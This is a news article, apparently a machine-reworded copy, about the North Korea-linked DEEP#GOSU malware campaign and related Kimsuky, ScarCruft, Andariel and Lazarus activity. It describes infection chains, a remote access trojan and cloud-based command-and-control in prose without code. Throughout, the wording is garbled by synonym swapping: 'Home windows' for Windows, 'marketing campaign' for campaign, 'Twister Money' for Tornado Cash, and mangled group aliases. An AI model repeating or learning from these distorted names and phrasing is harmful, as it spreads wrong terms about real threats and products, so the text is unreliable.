New DEEP#GOSU Malware Marketing campaign Targets Home windows Customers with Superior Techniques


A brand new elaborate assault marketing campaign has been noticed using PowerShell and VBScript malware to contaminate Home windows techniques and harvest delicate info.

Cybersecurity firm Securonix, which dubbed the marketing campaign DEEP#GOSU, said it is probably related to the North Korean state-sponsored group tracked as Kimsuky.

“The malware payloads used within the DEEP#GOSU signify a classy, multi-stage risk designed to function stealthily on Home windows techniques particularly from a network-monitoring standpoint,” safety researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov stated in a technical evaluation shared with The Hacker Information.

“Its capabilities included keylogging, clipboard monitoring, dynamic payload execution, and knowledge exfiltration, and persistence utilizing each RAT software program for full distant entry, scheduled duties in addition to self-executing PowerShell scripts utilizing jobs.”

A notable side of the an infection process is that it leverages reliable companies resembling Dropbox or Google Docs for command-and-control (C2), thus permitting the risk actor to mix undetected into common community visitors.

On prime of that, using such cloud companies to stage the payloads permits for updating the performance of the malware or delivering extra modules.

The place to begin is claimed to be a malicious e-mail attachment containing a ZIP archive with a rogue shortcut file (.LNK) that masquerades as a PDF file (“IMG_20240214_0001.pdf.lnk”).

The .LNK file comes embedded with a PowerShell script in addition to a decoy PDF doc, with the previous additionally reaching out to an actor-controlled Dropbox infrastructure to retrieve and execute one other PowerShell script (“ps.bin”).


The second-stage PowerShell script, for its half, fetches a brand new file from Dropbox (“r_enc.bin”), a .NET meeting file in binary kind that is truly an open-source distant entry trojan referred to as TruRat (aka TutRat or C# RAT) with capabilities to document keystrokes, handle recordsdata, and facilitate distant management.

It is value noting that Kimsuky has employed TruRat in a minimum of two campaigns uncovered by the AhnLab Safety Intelligence Middle (ASEC) final 12 months.

Additionally retrieved by the PowerShell script from Dropbox is a VBScript (“info_sc.txt”), which, in flip, is designed to run arbitrary VBScript code retrieved from the cloud storage service, together with a PowerShell script (“w568232.ps12x”).

The VBScript can be designed to make use of Home windows Administration Instrumentation (WMI) to execute instructions on the system, and arrange scheduled duties on the system for persistence.


One other noteworthy side of the VBScript is using Google Docs to dynamically retrieve configuration knowledge for the Dropbox connection, permitting the risk actor to alter the account info with out having to change the script itself.

The PowerShell script downloaded consequently is provided to assemble in depth details about the system and exfiltrate the main points through a POST request to Dropbox.

“The aim of this script seems to be designed to function a instrument for periodic communication with a command-and-control (C2) server through Dropbox,” the researchers stated. “Its principal functions embody encrypting and exfiltrating or downloading knowledge.”

In different phrases, it acts as a backdoor to manage the compromised hosts and repeatedly hold a log of consumer exercise, together with keystrokes, clipboard content material, and the foreground window.

The event comes as safety researcher Ovi Liber detailed North Korea-linked ScarCruft’s embedding of malicious code inside Hangul Phrase Processor (HWP) lure paperwork current in phishing emails to distribute malware like RokRAT.


“The e-mail incorporates a HWP Doc which has an embedded OLE object within the type of a BAT script,” Liber said. “As soon as the consumer clicks on the OLE object, the BAT script executes which in flip creates a PowerShell-based reflective DLL injection assault on the victims machine.”

It additionally follows Andariel’s exploitation of a reliable distant desktop answer known as MeshAgent to install malware like AndarLoader and ModeLoader, a JavaScript malware meant for command execution.

“That is the primary confirmed use of a MeshAgent by the Andariel group,” ASEC said. “The Andariel Group has been repeatedly abusing the asset administration options of home firms to distribute malware within the strategy of lateral motion, beginning with Innorix Agent up to now.”


Andariel, additionally recognized by the names Nicket Hyatt or Silent Chollima, is a sub-cluster of the infamous Lazarus Group, actively orchestrating assaults for each cyber espionage and monetary acquire.

The prolific state-sponsored risk actor has since been noticed laundering a piece of the crypto belongings stolen from the hack of crypto alternate HTX and its cross-chain bridge (aka HECO Bridge) by way of Twister Money. The breach led to the theft of $112.5 million in cryptocurrency in November 2023.

“Following frequent crypto-laundering patterns, the stolen tokens have been instantly swapped for ETH, utilizing decentralized exchanges,” Elliptic said. “The stolen funds then lay dormant till March 13, 2024, when the stolen crypto belongings started to be despatched by way of Twister Money.”

The blockchain analytics agency stated that Twister Money’s continuation of its operations regardless of sanctions have probably made it a horny proposition for the Lazarus Group to hide its transaction path following the shutdown of Sinbad in November 2023.

“The mixer operates by way of good contracts operating on decentralized blockchains, so it can’t be seized and shut down in the identical approach that centralized mixers resembling have been,” it famous.

Notify of
Inline Feedbacks
View all comments
Previous Post
RCE Vulnerability

Fortra Patches Vital RCE Vulnerability in FileCatalyst Switch Software

Next Post
Malware on Company Computers Exposed Customer Data

Malware on Firm Computer systems Uncovered Buyer Information

Related Posts